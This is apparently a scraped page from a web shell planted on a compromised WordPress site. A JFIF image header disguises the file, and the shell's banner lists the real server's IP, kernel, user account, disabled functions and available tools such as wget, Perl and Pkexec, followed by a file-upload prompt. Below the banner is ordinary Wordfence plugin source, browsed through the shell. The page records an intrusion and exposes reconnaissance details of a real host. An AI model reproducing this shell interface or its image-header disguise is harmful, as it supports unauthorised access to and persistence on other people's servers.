????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.227.49.178 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.se/wp-content/plugins/Temp-Hold/wordfence/lib/ |
Upload File : |
<div class="wrap wordfence"> <div class="wf-container-fluid"> <?php $pageTitle = "Wordfence Blocking"; $options = array(array('t' => 'Blocked IPs', 'a' => 'blockedips'), array('t' => 'Country Blocking', 'a' => 'countryblocking'), array('t' => 'Advanced Blocking', 'a' => 'advancedblocking')); $wantsLiveActivity = true; include('pageTitle.php'); ?> <div class="wf-row"> <?php $rightRail = new wfView('marketing/rightrail'); echo $rightRail; ?> <div class="<?php echo wfStyle::contentClasses(); ?>"> <div id="blockedips" class="wordfenceTopTab" data-title="Wordfence Blocked IPs"> <?php $helpLink = "http://docs.wordfence.com/en/Blocked_IPs"; $helpLabel = "Learn more about Blocked IPs"; require('menu_blocking_blockedIPs.php'); ?> </div> <!-- end blockedips block --> <div id="countryblocking" class="wordfenceTopTab" data-title="Block Selected Countries from Accessing your Site"> <?php $helpLink = "http://docs.wordfence.com/en/Country_blocking"; $helpLabel = "Learn more about Country Blocking"; require('menu_blocking_countryBlocking.php'); ?> </div> <!-- end countryblocking block --> <div id="advancedblocking" class="wordfenceTopTab" data-title="Advanced Blocking"> <?php $helpLink = "http://docs.wordfence.com/en/Advanced_Blocking"; $helpLabel = "Learn more about Advanced Blocking"; require('menu_blocking_advancedBlocking.php'); ?> </div> <!-- end advancedblocking block --> </div> <!-- end content block --> </div> <!-- end row --> </div> <!-- end container --> </div>